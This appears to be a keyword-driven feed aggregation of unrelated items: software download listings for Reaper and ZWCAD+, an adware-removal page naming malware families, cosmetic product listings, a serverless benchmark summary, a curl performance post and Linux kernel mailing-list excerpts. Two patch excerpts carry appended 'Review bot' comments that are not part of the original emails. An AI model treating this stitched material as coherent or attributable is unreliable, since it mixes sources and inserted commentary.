I checked the settings with the given examples and there wasn't any difference, so I'm confused! Should I do anything before adding packages? By the way, I tried to use a RTSC config file from one of the examples.

Thanks
          [Macintosh] Download Cockos Reaper v5.95 MacOSX - Audio recording, mixing and editing software for Mac

Reaper is a complete application for digital audio production that gives its users an unmatched set of tools for multitrack and MIDI recording, editing, processing, mixing and mastering of audio files. The program supports a wide range of audio recording and playback hardware, formats and plug-ins, and also lets its users script, extend and modify it. The software uses ASIO, Kernel Streaming, WaveOut and DirectSound for audio playback and recording, and it can ... sounds ...


http://p30download.com/81478

Category: Download » Macintosh » Software » Desktop, Software, Software » Utilities
Download link: http://p30download.com/fa/entry/81478


          Data Notes: From Hate Speech to Russian Troll Tweets
Welcome to Kaggle Data Notes! Enjoy these new, intriguing, and overlooked datasets and kernels. 1. 🤬 From Hate Speech to Russian Troll Tweets (link) 2. 🇰 Data Science Trends on Kaggle (link) 3. 👜Fashion AC-GAN with Keras (link) 4. 📈 (Bio)statistics in R: Part #2 (link) 5. 🛰 Segmenting Buildings in Satellite Images (link) 6. ⚽ World Cup 2018: The One That Nearly Came Home (link) 7. 🇯🇵 The Best "Izakaya" Restaurant in Kyoto (link) 8. 👹 Dataset: Russian Troll Tweets (link) 9. 📈 Dataset: Political Propaganda on Facebook ...
          Remove Search.searchmecenter.com from Windows 10: Get rid of Search.searchmecenter.com
Tips to remove Search.searchmecenter.com. More infections related to Search.searchmecenter.com:

  • Adware: INetSpeak.Iexplorr, Vapsup.bmh, TSAdBot, Adware.FindLyrics, Altnet, Adware.IpWins, Adware.Clickspring.B, TrustIn Bar
  • Browser Hijacker: InboxAce, MyPageFinder, BarQuery.com, Start.gamesagogo.iplay.com, Oibruvv.com, Findtsee.com, Papergap.com
  • Ransomware: BitStak Ransomware, Onion Ransomware, Coin Locker, Linkup Ransomware, Enjey Crypter Ransomware, PoshCoder, Gerkaman@aol.com Ransomware, Coverton Ransomware, Paycrypt Ransomware, PaySafeGen Ransomware, amagnus@india.com Ransomware, EncryptoJJS Ransomware, Venis Ransomware
  • Trojan: TrojanProxy.Win32-Agent, Trojan Horse Dropper.Agent.tid, Win32/TrojanDownloader.Wauchos.I, Kernel32.exe, ...
          Cast Your Kernel Results
none
          Lavender Vanilla Type Whipped Body Butter, Goat Milk, Shea and Cocoa Butter With Vitamin C, Handmade by GaGirlNaturals

9.25 USD

Lavender Vanilla Type Whipped Body Butter, Goat Milk, Shea and Cocoa Butter With Vitamin C, Handmade

Compare to Bath and Body Works Lavender Vanilla fragrance.

Lavender Vanilla is a soft and powdery herbal lavender sweetened with vanilla and a hint of musk. It is relaxing and tranquil, but also unique and memorable.

Want a handmade body butter that is skin softening and moisturizing and also has many wonderful benefits for your skin? Then, you have found a body butter for you! My handmade goat milk based whipped body butter is a luxurious treat for your skin. Made with goat milk, vitamin C, shea and cocoa butters, coconut, apricot kernel, avocado, olive, grape seed, pomegranate seed, argan, rose hip seed, and vitamin E oils to nourish your skin and provide many skin loving benefits.

Goat milk contains alpha-hydroxy acids that help to exfoliate dry, dead skin cells, contains probiotics which helps protect the skin from ultra violet light, contains high amounts of protein, fat, iron, vitamin A, B6, B12, C, D, E, and many more. These vitamins and minerals help slow down aging, help the skin rebuild, add elasticity, and help retain skin moisture, is readily absorbed into the skin, and very moisturizing. Vitamin C helps build collagen, protects against ultra violet rays, and contains antioxidants. Rose hip seed oil contains retinoic acid, a natural form of vitamin A. Pomegranate Seed oil is powerfully antioxidant and anti-inflammatory; and it is known to significantly boost epidermal cellular regeneration. Avocado, apricot kernel, olive, grape seed and coconut oils are readily absorbed into the skin, and very moisturizing.

4 Oz. Jar

My handmade products are made to order fresh for you.

*Paraben, propylene glycol, gluten, and phthalate free.*

Ingredients: Distilled water, sunflower oil, soya oil, vegetable glycerin, potassium sorbate, meadow foam oil, jojoba oil, goat's milk, aloe vera, vitamin c, shea butter, cocoa butter, coconut oil, pomegranate seed oil, olive oil, apricot kernel oil, avocado oil, grape seed oil, argan oil, rose hip seed oil, vitamin E oil, stearic acid, cetyl alcohol, emulsifying wax, palmitic acid

** Please note that cosmetic products like soaps and lotions can begin to melt if left in high temperatures. Please note your tracking information and try to be available to receive your package promptly.**

My Credentials:

I have a Master Cosmetology License and a Certificate
In Natural Health and Healing.

[*Type*] - Name trademarks and copyrights are properties of their respective manufacturers and/or designers. These versions are NOT to be confused with the originals and GaGirlNaturals has no affiliation with the manufacturers/designers. This description is to give the customer an idea of scent character, not to mislead, confuse the customer or infringe on the manufacturers/designer's name and valuable trademark.


          Bright Crystal Type Whipped Body Butter, Goat Milk, Shea and Cocoa Butter With Vitamin C, Handmade by GaGirlNaturals

9.25 USD

Bright Crystal Type Whipped Body Butter, Goat Milk, Shea and Cocoa Butter With Vitamin C, Handmade

Compare to Versace Bright Crystal fragrance.

Bright Crystal is a fresh sensual blend of chilled yuzu and pomegranate mixed with soothing blossoms of peony, magnolia and lotus flower and warmed with musk and amber.

Want a handmade body butter that is skin softening and moisturizing and also has many wonderful benefits for your skin? Then, you have found a body butter for you! My handmade goat milk based whipped body butter is a luxurious treat for your skin. Made with goat milk, vitamin C, shea and cocoa butters, coconut, apricot kernel, avocado, olive, grape seed, pomegranate seed, argan, rose hip seed, and vitamin E oils to nourish your skin and provide many skin loving benefits.

Goat milk contains alpha-hydroxy acids that help to exfoliate dry, dead skin cells, contains probiotics which helps protect the skin from ultra violet light, contains high amounts of protein, fat, iron, vitamin A, B6, B12, C, D, E, and many more. These vitamins and minerals help slow down aging, help the skin rebuild, add elasticity, and help retain skin moisture, is readily absorbed into the skin, and very moisturizing. Vitamin C helps build collagen, protects against ultra violet rays, and contains antioxidants. Rose hip seed oil contains retinoic acid, a natural form of vitamin A. Pomegranate Seed oil is powerfully antioxidant and anti-inflammatory; and it is known to significantly boost epidermal cellular regeneration. Avocado, apricot kernel, olive, grape seed and coconut oils are readily absorbed into the skin, and very moisturizing.

4 Oz. Jar

My handmade products are made to order fresh for you.

*Paraben, propylene glycol, gluten, and phthalate free.*

Ingredients: Distilled water, sunflower oil, soya oil, vegetable glycerin, potassium sorbate, meadow foam oil, jojoba oil, goat's milk, aloe vera, vitamin c, shea butter, cocoa butter, coconut oil, pomegranate seed oil, olive oil, apricot kernel oil, avocado oil, grape seed oil, argan oil, rose hip seed oil, vitamin E oil, stearic acid, cetyl alcohol, emulsifying wax, palmitic acid

** Please note that cosmetic products like soaps and lotions can begin to melt if left in high temperatures. Please note your tracking information and try to be available to receive your package promptly.**

My Credentials:

I have a Master Cosmetology License and a Certificate
In Natural Health and Healing.

[*Type*] - Name trademarks and copyrights are properties of their respective manufacturers and/or designers. These versions are NOT to be confused with the originals and GaGirlNaturals has no affiliation with the manufacturers/designers. This description is to give the customer an idea of scent character, not to mislead, confuse the customer or infringe on the manufacturers/designer's name and valuable trademark.


          Help setting up Apache2 Server
This might be a little long, so I apologize. I'm running Debian Stretch with KDE Plasma 5, kernel 4.9.0-7-amd64 on a Lenovo thinkpad x61 2Ghz, 4 GB RAM. I'm trying to run RISC with RPCemu and also...
          Pick a serverless fight: A comparative research of AWS Lambda, Azure Functions ...

The saturation point is nowhere to be seen in the serverless discussion, with tons of news coming online every day and numerous reports trying to take the pulse of one of the hottest topics out there.

This time, however, we are not going to discuss any of the above. This article is going to be a bit more…academic!

During the last USENIX Annual Technical Conference ’18, which took place in Boston, USA in mid-July, a remarkably interesting piece of academic research was presented.

The paper “Peeking Behind the Curtains of Serverless Platforms” is a comparative research and analysis of the three big serverless providers AWS Lambda, Azure Functions and Google Cloud Functions. The authors (Liang Wang, Mengyuan Li, Yinqian Zhang, Thomas Ristenpart, Michael Swift) conducted the most in-depth (so far) study of resource management and performance isolation in these three providers.

The study systematically examines a series of issues related to resource management including how quickly function instances can be launched, function instance placement strategies, and function instance reuse. What’s more, the authors examine the allocation of CPU, I/O and network bandwidth among functions and the ensuing performance implications, as well as a couple of exploitable resource accounting bugs.

Did I get your attention now?

In this article, we have an overview of the most interesting results presented in the original paper.

Let’s get started!

Methodology

First things first. Let’s have a quick introduction to the methodology of this study.

The authors conducted this research by integrating all the necessary functionalities and subroutines into a single function that they call a measurement function.

According to the definition found in the paper, this function performs two tasks:

- Collect invocation timing and function instance runtime information
- Run specified subroutines (e.g., measuring local disk I/O throughput, network throughput) based on received messages

In order to have a clear overview of the specifications for each provider, the following table provides a comparison of function configuration and billing in the three services.


The authors examined how instances and VMs are scheduled in the three serverless platforms in terms of instance coldstart latency, lifetime, scalability, and idle recycling and the results are extremely interesting.

Scalability and instance placement

One of the most intriguing findings, in my opinion, is on the scalability and instance placement of each provider. There is a significant discrepancy among the three big services, with AWS being the best regarding support for concurrent execution:

AWS: “3,328MB was the maximum aggregate memory that can be allocated across all function instances on any VM in AWS Lambda. AWS Lambda appears to treat instance placement as a bin-packing problem, and tries to place a new function instance on an existing active VM to maximize VM memory utilization rates.”

Azure: Despite the fact that Azure documentation states that it will automatically scale up to at most 200 instances for a single Nodejs-based function and at most one new function instance can be launched every 10 seconds, the tests of Nodejs-based functions performed by the authors showed that “at most 10 function instances running concurrently for a single function”, no matter how the interval between invocations was changed.

Google: Contrary to what Google claims on how HTTP-triggered functions will scale to the desired invocation rate quickly, the service failed to provide the desired scalability for the study. “In general, only about half of the expected number of instances, even for a low concurrency level (e.g., 10), could be launched at the same time, while the remainder of the requests were queued.”

Interesting fact: More than 89% of VMs tested achieved 100% memory utilization.

Coldstart and VM provisioning

Concerning coldstart (the process of launching a new function instance) and VM provisioning, AWS Lambda appears to be on the top of its game:

AWS: Two types of coldstart events were examined: “a function instance is launched (1) on a new VM that we have never seen before and (2) on an existing VM. Intuitively, case (1) should have significantly longer coldstart latency than (2) because case (1) may involve starting a new VM.” However, the study shows that “case (1) was only slightly longer than (2) in general. The median coldstart latency in case (1) was only 39 ms longer than (2) (across all settings). Plus, the smallest VM kernel uptime (from /proc/uptime) that was found was 132 seconds, indicating that the VM has been launched before the invocation.” Therefore, these results show that AWS has a pool of ready VMs! What’s more, concerning the extra delays in case (1), the authors argue that they are “more likely introduced by scheduling rather than launching a VM.”

Azure: According to the findings, it took much longer to launch a function instance in Azure, despite the fact that their instances are always assigned 1.5GB memory. The median coldstart latency was 3,640 ms in Azure.

Google: “The median coldstart latency in Google ranged from 110 ms to 493 ms. Google also allocates CPU proportionally to memory, but in Google memory size has a greater impact on coldstart latency than in AWS.”

In addition to the tests described above, the research team “collected the coldstart latencies of 128 MB, python 2.7 (AWS) or Nodejs 6.* (Google and Azure) based functions every 10 seconds for over 168 hours (7 days), and calculated the median of the coldstart latencies collected in a given hour.” According to the results, “the coldstart latencies in AWS were relatively stable, as were those in Google (except for a few spikes). Azure had the highest network variation over time, ranging from about 1.5 seconds up to 16 seconds.” Take a look at the figure below:


Source: “Peeking Behind the Curtains of Serverless Platforms”, Figure 8, p. 139

Instance lifetime

The research team defines instance lifetime as “the longest time a function instance stays active.”

Keeping in mind that users prefer the longer lifetimes, the results depict Azure winning this one since Azure functions provide significantly longer lifetimes than AWS and Google, as you can see in the figures below:


Source: “Peeking Behind the Curtains of Serverless Platforms”, Figure 9, p.140

Idle instance recycling

Instance maximum idle time is defined by the authors as “the longest time an instance can stay idle before getting shut down.” Specifically for each service provider, the results show:

AWS:An instance could usually stay inac
          much faster curl uploads on Windows with a single tiny commit

These days, operating system kernels provide TCP/IP stacks that can do really fast network transfers. It's not even unusual for ordinary people to have gigabit connections at home and of course we want our applications to be able to take advantage of them.

I don't think many readers here will be surprised when I say that fulfilling this desire turns out much easier said than done in the Windows world.

Autotuning?

Since Windows 7 / 2008R2, Windows implements send buffer autotuning. Simply put, the faster transfer and longer RTT the connection has, the larger the buffer it uses (up to a max) so that more un-acked data can be outstanding and thus enable the system to saturate even really fast links.

Turns out this useful feature isn't enabled when applications use non-blocking sockets. The send buffer isn't increased at all then.

Internally, curl is using non-blocking sockets and most of the code is platform agnostic so it wouldn't be practical to switch that off for a particular system. The code is pretty much independent of the target that will run it, and now with this latest find we have also started to understand why it doesn't always perform as well on Windows as on other operating systems: the upload buffer (SO_SNDBUF) is fixed size and simply too small to perform well in a lot of cases.

Applications can still enlarge the buffer, if they're aware of this bottleneck, and get better performance without having to change libcurl, but I doubt a lot of them do. And really, libcurl should perform as well as it possibly can just by itself without any necessary tuning by the application authors.

Users testing this out

Daniel Jelinski brought a fix for this that repeatedly polls Windows during uploads to ask for a suitable send buffer size and then resizes it on the go if it deems a new size is better. In order to figure out whether this patch is indeed a good idea or if there's a downside for some, we went wide and called out for users to help us.

The results were amazing. With speedups up to almost 7 times faster, exactly those newer Windows versions that supposedly have autotuning can obviously benefit substantially from this patch. The median test still performed more than twice as fast uploads with the patch. Pretty amazing really. And beyond weird that this crazy thing should be required to get ordinary sockets to perform properly on an updated operating system in 2018.

Windows XP isn't affected at all by this fix, and we've seen tests running as VirtualBox guests in NAT-mode also not gain anything, but we believe that's VirtualBox's "fault" rather than Windows or the patch.

Landing

The commit is merged into curl's master git branch and will be part of the pending curl 7.61.1 release, which is due to ship on September 5, 2018. I think it can serve as an interesting case study to see how long it takes until Windows 10 users get their versions updated to this.

Table of test runs

The table lists the Windows version, the test times for the runs with the unmodified curl and with the patched one, how much time the second run needed as a percentage of the first, a column with comments and last a column showing the speedup multiple for that test.

Thank you everyone who helped us out by running these tests!

| Version | Time vanilla | Time patched | New time | Comment | speedup |
|---|---|---|---|---|---|
| 6.0.6002 | 15.234 | 2.234 | 14.66% | Vista SP2 | 6.82 |
| 6.1.7601 | 8.175 | 2.106 | 25.76% | Windows 7 SP1 Enterprise | 3.88 |
| 6.1.7601 | 10.109 | 2.621 | 25.93% | Windows 7 Professional SP1 | 3.86 |
| 6.1.7601 | 8.125 | 2.203 | 27.11% | 2008 R2 SP1 | 3.69 |
| 6.1.7601 | 8.562 | 2.375 | 27.74% | | 3.61 |
| 6.1.7601 | 9.657 | 2.684 | 27.79% | | 3.60 |
| 6.1.7601 | 11.263 | 3.432 | 30.47% | Windows 2008R2 | 3.28 |
| 6.1.7601 | 5.288 | 1.654 | 31.28% | | 3.20 |
| 10.0.16299.309 | 4.281 | 1.484 | 34.66% | Windows 10, 1709 | 2.88 |
| 10.0.17134.165 | 4.469 | 1.64 | 36.70% | | 2.73 |
| 10.0.16299.547 | 4.844 | 1.797 | 37.10% | | 2.70 |
| 10.0.14393 | 4.281 | 1.594 | 37.23% | Windows 10, 1607 | 2.69 |
| 10.0.17134.165 | 4.547 | 1.703 | 37.45% | | 2.67 |
| 10.0.17134.165 | 4.875 | 1.891 | 38.79% | | 2.58 |
| 10.0.15063 | 4.578 | 1.907 | 41.66% | | 2.40 |
| 6.3.9600 | 4.718 | 2.031 | 43.05% | Windows 8 (original) | 2.32 |
| 10.0.17134.191 | 3.735 | 1.625 | 43.51% | | 2.30 |
| 10.0.17713.1002 | 6.062 | 2.656 | 43.81% | | 2.28 |
| 6.3.9600 | 2.921 | 1.297 | 44.40% | Windows 2012R2 | 2.25 |
| 10.0.17134.112 | 5.125 | 2.282 | 44.53% | | 2.25 |
| 10.0.17134.191 | 5.593 | 2.719 | 48.61% | | 2.06 |
| 10.0.17134.165 | 5.734 | 2.797 | 48.78% | run 1 | 2.05 |
| 10.0.14393 | 3.422 | 1.844 | 53.89% | | 1.86 |
| 10.0.17134.165 | 4.156 | 2.469 | 59.41% | had to use the HTTPS endpoint | 1.68 |
| 6.1.7601 | 7.082 | 4.945 | 69.82% | over proxy | 1.43 |
| 10.0.17134.165 | 5.765 | 4.25 | 73.72% | run 2 | 1.36 |
| 5.1.2600 | 10.671 | 10.157 | 95.18% | Windows XP Professional SP3 | 1.05 |
| 10.0.16299.547 | 1.469 | 1.422 | 96.80% | in a VM running on linux | 1.03 |
| 5.1.2600 | 11.297 | 11.046 | 97.78% | XP | 1.02 |
| 6.3.9600 | 5.312 | 5.219 | 98.25% | | 1.02 |
| 5.2.3790 | 5.031 | 5 | 99.38% | Windows 2003 | 1.01 |
| 5.1.2600 | 7.703 | 7.656 | 99.39% | XP SP3 | 1.01 |
| 10.0.17134.191 | 1.219 | 1.531 | 125.59% | FTP | 0.80 |
| TOTAL | 205.303 | 102.271 | 49.81% | | 2.01 |
| MEDIAN | | | 43.51% | | 2.30 |
          Running Linux on a Chromebook, but the keyboard and sound don't respond
I'm running Linux on a Chromebook, but the keyboard and sound don't respond. I only started using Linux a few days ago, I don't really understand drivers either, and there is no sign of a solution. I would appreciate it if you could explain things as simply as possible. System: Host: chrx Kernel: 4.9.4-galliumos-braswell x86_64 (64 bit gcc: 5.4.0) Desktop: Xfce 4.12.3 (Gtk 2.24.30) Distro:
          Cedar Rapids Pulls Away for 9-4 Win
CLINTON, IOWA - A five-run, two-out rally in the fifth inning pushed the Cedar Rapids Kernels toward a 9-4 victory Thursday against the Clinton Lumber... - MWL Cedar Rapids Kernels
          LR-Link Launches New Mass-Market 10GigE NIC Based on Tehuti Networks’ Tech

LR-Link, a maker of networking solutions from China, has announced its first 10 GbE NIC, the wordy-named LREC6860BT. The new NIC is the first such retail product we've seen based on a design from Tehuti Networks, an Israel-based developer, bringing some more welcome competition to the 10GigE NIC market. LR-Link will be aiming at the (relative) mass-market for standalone NICs with this card, with the card now selling in Japan as well as online for less than $100.

Under the hood, the LR-Link LREC6860BT NIC is based on Tehuti Networks’ TN4010 MAC, which is further paired with Marvell’s Alaska X 88X3310P 10 GbE transceiver. The card features a PCIe Gen 2 x4 interface as well as an RJ45 connector that supports 100M, 1G, 2.5G, 5G, and 10G speeds using Cat5e/Cat6/Cat6A cabling. The card fully supports contemporary operating systems from Apple, Microsoft, and VMware as well as various Linux distributions. Therefore, the NIC is drop-in compatible with most computers that are in use today.

LR-Link's 10 GbE NIC

| | LREC6860BT |
|---|---|
| Silicon: MAC | Tehuti Networks TN4010 |
| Silicon: Transceiver | Marvell Alaska X 88X3310P |
| 100BASE-T | Yes |
| 1000BASE-T | Yes |
| 2.5GBASE-T | Yes |
| 5GBASE-T | Yes |
| 10GBASE-T | Yes (over Cat6A cables) |
| Ports | 1 |
| OS Compatibility: Apple | MacOS 10.10.3 or later |
| OS Compatibility: Microsoft | Windows 7 / 8 / 8.1 / 10 or later; Windows Server 2008 R2 / 2012 / 2012 R2 / 2016 R2 or later |
| OS Compatibility: VMware | Vmware ESX / ESXi 5.x / 6.x or later |
| OS Compatibility: Linux | Linux Stable Kernel version 2.6.x/3.x or later |
| Price | $83 - $91 |
| Release Date | Q3 2018 |

The LREC6860BT is currently available from at least one retailer in Japan for ¥10,164 ($91) with VAT, which is not very high considering the fact that PC components tend to cost more in Japan than in the rest of the world. Unfortunately products from LR-Link aren't readily available from retailers outside China and Japan, but the company’s devices (including the 10 GbE NIC) can still be purchased from official stores on AliExpress, Ebay, and JD.com.

10 GbE networks are not yet widespread in SOHO environments, primarily because there are not many reasonably-priced 10 GbE switches. Meanwhile, a number of companies have released their relatively affordable 10 GbE NICs based on chips from Aquantia over the past few quarters, anticipating demand for such cards from enthusiasts. Aquantia is not the only provider of solutions for inexpensive 10 GbE cards. Tehuti Networks is considerably less known because it is focused on working with enterprise OEMs rather than with AIBs and retail. Nonetheless, having a second player in the space for cheap 10GigE/NBASE-T silicon is an important part of driving down the cost of the technology – and boosting adoption – even further.

Source: PC Watch


          Problem encountered with openfiler ESA 2.99.1
Could an expert help me see how to solve this: kernel panic - not syncing:fatal exception call trace [] panic+0xa5/0x198 I'm a newbie and don't understand what this problem is.
          Re: [PATCH v2 2/2] RISC-V: Don't use a global include guard for ua ...
Guenter Roeck writes: (Summary)
https://wiki.qemu.org/Documentation/Platforms/RISCV
Here are my qemu command lines:
qemu-system-riscv64 -M virt -m 512M -no-reboot -bios bbl \
    -kernel vmlinux -netdev user,id=net0 -device virtio-net-device,netdev=net0 \
    -initrd rootfs.cpio \
    -append 'rdinit=/sbin/init earlycon console=ttyS0,115200' \
    -nographic -monitor none
qemu-system-riscv64 -M virt -m 512M -no-reboot -bios bbl \
    -kernel vmlinux -netdev user,id=net0 -device virtio-net-device,netdev=net0 \
    -device virtio-blk-device,drive=d0 \
    -drive file=rootfs.ext2,if=none,id=d0,format=raw \
    -append 'root=/dev/vda rw earlycon console=ttyS0,115200' \
    -nographic -monitor none
Root file systems and the bbl binary are published at https://gi
          Re: [PATCH v1 3/4] drivers: edac: Add EDAC driver support for QCOM ...
Borislav Petkov writes: (Summary) On Wed, Aug 01, 2018 at 01:33:34PM -0700, Venkata Narendra Kumar Gutta wrote: Add error reporting driver for SBEs and DBEs. Space between name and email address.
+L: linux-arm-msm@vger.kernel.org
Also
L: linux-edac@vger.kernel.org
so that the EDAC ML gets CCed too.
+ depends on EDAC=y
Why on EDAC=y? Or some other smarter scheme to save object size...
+llcc_ecc_irq_handler (int irq, void *edev_ctl)
Stray " " after function name.
+ edev_ctl->pvt_info = (struct llcc_drv_data *) llcc_driv_data;
          [PATCH 03/16] staging: gasket: core: fix line continuation indent ...
Todd Poynor writes: (Summary) From: Todd Poynor <toddpoynor@google.com>
Previous cleanups missed a case of multi-line function call with line continuation parameters not aligned per kernel style. 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/staging/gasket/gasket_core.c b/drivers/staging/gasket/gasket_core.c index 37d14e30ffa21..3fb805204d700 100644 --- a/drivers/staging/gasket/gasket_core.c +++ b/drivers/staging/gasket/gasket_core.c @@ -231,8 +231,9 @@ static int gasket_alloc_dev(struct gasket_internal_desc *internal_desc, dev_info->devt = MKDEV(driver_desc->major, driver_desc->minor + gasket_dev->dev_idx);
          Re: [PATCH] reiserfs: fix broken xattr handling (heap corruption, ...
Jann Horn writes: (Summary) On Thu, Aug 2, 2018 at 5:16 PM Jann Horn <jannh@google.com> I have not received any replies to this patch, which fixes a kernel security bug, for a week.
Whose tree should this go through? reiserfs is marked as "supported", but does not have a maintainer or a git repo listed, just a mailinglist, so I guess it probably has to go through either Al Viro's or akpm's tree? Looks like akpm signed off on the last commits in reiserfs...
2.18.0.597.ga71716f1ad-goog

          [PATCH] ia64:tioce_provider: Use kmemdup rather than implement the ...
zhong jiang writes: (Summary) The kmemdup has implemented the function that kmalloc() + memcpy will do. 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/ia64/sn/pci/tioce_provider.c b/arch/ia64/sn/pci/tioce_provider.c index 3bd9abc..9ba61bc 100644 --- a/arch/ia64/sn/pci/tioce_provider.c +++ b/arch/ia64/sn/pci/tioce_provider.c @@ -1000,11 +1000,11 @@ * Allocate kernel bus soft and copy from prom. */ - tioce_common = kzalloc(sizeof(struct tioce_common), GFP_KERNEL); + tioce_common = kmemdup(prom_bussoft, sizeof(struct tioce_common), + GFP_KERNEL);
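Review bot: the commit message describes the old code as kmalloc() + memcpy, but the removed line in the hunk at -1000,11 calls kzalloc(); the message should say so and note that dropping the zeroing is safe because kmemdup() copies the full sizeof(struct tioce_common) from prom_bussoft. The diffstat reports 2 deletions while only the kzalloc() line is visible here, so confirm that the second deletion is the now-redundant memcpy and that the allocation-failure check still follows the kmemdup() call.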
          [PATCH] sched/core: Fix compiling warring in smp=n case
Dou Liyang writes: (Summary) When compiling kernel with SMP disabled, the build warns with:
kernel/sched/core.c: In function ‘update_rq_clock_task’:
kernel/sched/core.c:139:17: warning: unused variable ‘irq_delta’ [-Wunused-variable]
s64 steal = 0, irq_delta = 0;
Fix this by reverting the HAVE_SCHED_AVG_IRQ to
defined(CONFIG_IRQ_TIME_ACCOUNTING) ||
          [PATCH bpf-next v2 1/4] docs: net: Fix various minor typos
"Tobin C. Harding" writes: (Summary) The JIT compiler is transparently invoked for each attached filter from user space or for internal kernel users if it has been previously enabled by root: @@ -572,7 +572,7 @@ Internally, for the kernel interpreter, a different instruction set format with similar underlying principles from BPF described in previous paragraphs is being used. While eBPF is an ISA, BPF extensions date back to classic BPF's 'overloading' @@ -647,12 +647,12 @@ Some core changes of the new internal format: 32-bit architectures run 64-bit internal BPF programs via interpreter.
          Re: [PATCH v3] resource: Merge resources on a node when hot-adding ...
Andrew Morton writes: (Summary) On Thu, 9 Aug 2018 12:54:09 +1000 Rashmica Gupta <rashmica.g@gmail.com> wrote: merge contiguous resources on the node.
What is the end-user impact of this patch?
Do you believe the fix should be merged into 4.18? Backporting into -stable kernels? If so, why?
Thanks.

          Re: [PATCH v2 2/2] RISC-V: Don't use a global include guard for ua ...
Palmer Dabbelt writes: (Summary) They'll be necessary to make this all work, and there's a v4 out now that when combined with for-next should get you to userspace.
https://lore.kernel.org/lkml/20180809075602.989-1-hch@lst.de/T/#u
Also, what is your methodology? I follow
https://wiki.qemu.org/Documentation/Platforms/RISCV
and could natively compile and run hello world with an earlier version of Christoph's patch set, which is really only cosmetically different than the v4.
          Re: [PATCH] checkpatch: DT bindings should be a separate patch
Andrew Morton writes: On Thu, 9 Aug 2018 14:50:32 -0600 Rob Herring <robh@kernel.org> wrote: + "DT binding docs and includes should be a separate patch\n"); A pointer to Documentation/devicetree/bindings/submitting-patches.txt might be helpful?
}
}

          Re: [PATCH v4 0/4] seccomp trap to userspace
Dinesh Subhraveti writes: (Summary) As such, I spoke about the approach, its value for networking and a few possible ways of implementing it in the kernel at Linux Plumbers Conference 2017.
As a contractor and a member of our team at AppSwitch (FKA Fermat), Tycho Andersen helped implement a fully user space version of system call trap mechanism based on seccomp / fd-passing and participated in our team discussions about upstreaming a kernel version of the feature. Given that context, we were taken aback that he posted the v1 patch set without letting us know and without any mention of AppSwitch in the post even though he was still under contract at that time.
In any case, please note that we will communicate with Tycho directly regarding this matter going forward.
--
Dinesh Subhraveti

          Re: [RFC PATCH v2 1/4] dt-bindings: misc: Add bindings for misc. B ...
Kun Yi writes: (Summary) After going through the thread I figured that I'd like to share a few things we needed to hack when programming several BMC boards:
- Debug UART enable/mux
- Disable GPIO D/E passthrough (I think this is supported by the current pinctrl driver)
- RMII/RGMII strapping
- iLPC2AHB control
- SPI master mux select
- Various SuperIO configurations
As for the discussion whether these belong to a platform driver or device tree nodes, I think in an ideal world all these configurations could be nicely grouped and abstracted in a platform kernel driver (or drivers). Sometimes we need initial values for these parameters set before running userspace, and setting such values in device tree is easier than using #defines or kernel parameters.
          Re: lspci: Display path to device
Matthew Wilcox writes: Martin? Bjorn's looking to merge this soon and it'd be nice to have the support in lspci too.
On Tue, Jul 17, 2018 at 01:39:00PM -0700, Matthew Wilcox wrote: More majordomo info at http://vger.kernel.org/majordomo-info.html
          Re: [PATCH v3 7/7] firmware: coreboot: Request table region for ex ...
Julius Werner writes: (Summary) Because it seems that it only prevents accesses to areas marked as IORESOURCE_BUSY, and while I can't fully follow how the kernel assigns that, comments suggest that this is only set when "Driver has marked this resource busy".
So after you make the change to the other patch where we immediately unmap the coreboot table again at the end of the probe() function, shouldn't it become available to userspace again even with IO_STRICT_DEVMEM set?
On Thu, Aug 9, 2018 at 4:37 PM Julius Werner <jwerner@chromium.org>
          Re: [PATCH v3 7/7] firmware: coreboot: Request table region for ex ...
Julius Werner writes: (Summary) But cbmem can also print some of the other CBMEM sections which it finds by querying the coreboot table, such as the firmware log or the boot timestamps.
So the question is how we can get to that content if /dev/mem isn't available anymore. but then we'd essentially want that to take absolute addresses because that's what the coreboot table pointers contain, so we would've just built /dev/mem by another name (for a restricted range).
The nicest thing, really, would be if there was a way for a kernel driver to mark specific regions as "allowed" by /dev/mem.
          [PATCH 2/2] staging: fbtft: Adds space around "/"
Leonardo Brás writes: (Summary) Kernel coding style recommends a space char around "/". 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/staging/fbtft/fbtft.h b/drivers/staging/fbtft/fbtft.h index 798a8fe98e95..25302ffc4000 100644 --- a/drivers/staging/fbtft/fbtft.h +++ b/drivers/staging/fbtft/fbtft.h @@ -232,7 +232,7 @@ struct fbtft_par { bool polarity; -#define NUMARGS(...) (sizeof((int[]){__VA_ARGS__})/sizeof(int)) +#define NUMARGS(...) (sizeof((int[]){__VA_ARGS__}) / sizeof(int)) #define write_reg(par, ...) \ ((par)->fbtftops.write_register(par, NUMARGS(__VA_ARGS__), __VA_ARGS__)) -- 2.18.0
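Review bot: the subject line reads 'Adds space around "/"', while kernel commit subjects and descriptions are written in the imperative mood; suggest 'staging: fbtft: Add spaces around "/"'. The NUMARGS change in the hunk at -232,7 is whitespace-only, so the macro's expansion is unchanged and nothing else in the hunk needs attention.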

          ZWCAD+ 2015 SP2.1 Pro 2015.05.26.27086 180810

ZWCAD+ 2015 SP2.1 Pro 2015.05.26.27086 180810
[center]

ZWCAD+ 2015 SP2.1 Pro 2015.05.26.27086 | 245.21 MB
A cost-effective light-weight CAD platform with .dwg compatibility for drafting, modeling, and drawing. The new memory optimization technology enables ZWCAD+ to open any drawing with memory usage reduced by 50%. That is why it works smoothly with drawings that are even over 100 MB. It ensures non-stop operation throughout the day.
We innovate to fulfill your design desires

[/center]

[center]
Smart Mouse, Smart Peek and a different Ribbon Interface are tailor-made to give you a light weight, flexible and fast user experience.
Seamless compatibility with other CAD software
Having been through over 50,000 extremely rigorous drawing tests to guarantee seamless .dwg compatibility, ZWCAD+ makes cross-platform communication easier than ever before. Now ZWCAD+ can also support DWG 2013.
Code-level compatible APIs easily create better solutions
ZRX, ARX and .NET are now code-level compatible. Lisp routines can now run directly on ZWCAD+ with only a few modifications. The new APIs enable developers to port their applications to ZWCAD+ 10 times faster.
Flexible workflow between desktop and mobile
With a built-in Online Module in ZWCAD+, now you can save your drawings and customized configuration to third-party cloud services, such as Dropbox, Google Drive and more. ZWCAD+ also provides a mobile solution, ZWCAD Touch for portable devices, which lets you work freely on your desktop and on the go.
ZWCAD+ 2015 Release Features:
- Big upgrade to ZWCAD+'s kernel enables all design information to be easily and accurately exchanged between different languages.
